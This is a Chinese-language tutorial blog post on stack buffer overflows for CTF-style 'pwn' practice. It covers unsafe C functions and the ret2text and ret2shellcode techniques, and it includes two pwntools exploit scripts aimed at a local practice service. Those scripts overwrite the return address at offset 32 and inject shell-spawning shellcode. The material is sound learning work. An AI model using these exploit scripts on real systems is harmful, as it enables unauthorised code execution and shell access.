码迷,mamicode.com
首页 > 其他好文 > 详细

Pwn_5 Stack Overflow

时间:2018-02-22 23:08:59      阅读:206      评论:0      收藏:0      [点我收藏+]

标签:nec   images   ret   res   一个   ext   pos   inter   bubuko   

Buffer Overflow

因为程序本身没有正确检查输入数据的大小,造成攻击者可以输入比buffer还要大的数据,使得超出部分覆盖程序的其他部分,影响程序执行。

Stack Overflow

利用方式简单,可以直接覆盖return address和控制参数

Vunlnerable Function

  • gets
  • scanf
  • strcpy
  • sprintf
  • memcpy
  • strcat


Return to Text

控制程序的返回地址到原本程序中的函数(代码)

例如有类似的function,就可以直接跳转到这个function,function的地址可以用过IDA Pro或者objdump来查找

  • system(‘/bin/sh’)   //很少
  • execve(‘/bin/sh’,NULL,NULL)

Return to Shellcode

  • 覆盖返回地址
  • 跳转到func或者shell

要做的事情

1.确定偏移地址offest

2.ret->shell

多输入,如果报了段错误说明有   溢出点

技术分享图片偏移地址是32

函数地址

技术分享图片0x804851D

一个脚本

from pwn import *
r = remote (‘127.0.0.1‘,4000)   #connect

r.sendline(‘a‘*32 +p32(0x804851D) ) #offset + ret

r.interactive()


技术分享图片丢进IDA看伪代码

双击name,name是一个未初始化的全局变量,在bss段中,这是一种关键信息。地址为0x0804A060,不改变

技术分享图片

from pwn import *
r = remote (‘127.0.0.1‘,4000)   #connect

r.recvuntil(‘Name:‘)

r.sendline(asm(shellcraft.sh()) ) #offset + ret

r.recvuntil(‘Try your best: ‘)

r.sendline(‘a‘*32+p32(0x0804A060))

r.interactive()   # interact

返回地址改为全局变量的地址

Pwn_5 Stack Overflow

标签:nec   images   ret   res   一个   ext   pos   inter   bubuko   

原文地址:https://www.cnblogs.com/rookieDanny/p/8460353.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!